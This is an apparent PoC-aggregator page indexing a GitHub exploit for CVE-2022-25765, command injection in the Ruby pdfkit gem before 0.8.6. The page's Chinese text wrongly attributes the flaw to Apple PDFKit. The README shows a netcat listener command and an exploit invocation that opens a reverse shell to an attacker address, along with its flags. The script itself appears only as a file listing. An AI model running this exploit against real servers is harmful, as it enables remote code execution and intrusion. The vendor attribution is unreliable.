CVE-2022-25765 PoC — Apple PDFKit 安全漏洞

Source

https://github.com/nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765

Associated Vulnerability

Title:Apple PDFKit 安全漏洞 (CVE-2022-25765)
Description:Apple PDFKit是美国苹果（Apple）公司的其中的一个PDF文档生成组件。 Apple PDFKit 存在安全漏洞，攻击者可利用该漏洞执行非法命令。

Description

Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6

Readme

# PDFkit-CMD-Injection (CVE-2022-25765)
Exploit for **CVE-2022-25765** command injection in pdfkit &lt; 0.8.6

See more details about the vulnerability [here](https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795)

## PoC

Run the netcat on your host:
``` 
$ nc -lvnp 1337
``` 

Run the exploit (example):
``` 
$ ./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
[*] Input target address is http://localhost
[*] Input address for reverse connect is 10.10.14.122
[*] Input port is 1337
[!] Run the shell... Press Ctrl+C after successful connection
``` 

Flags:
``` 
-t, --target  Address of target in http-format
-a, --addr    Address for reverse connect
-p, --port    Port for reverse connect, 9001 by default       
```

File Snapshot


 [4.0K]  /data/pocs/ad0beb6240fd9781a536cb43fe9d9287808fa58a
├── [1.5K]  CVE-2022-25765.py
└── [ 736]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!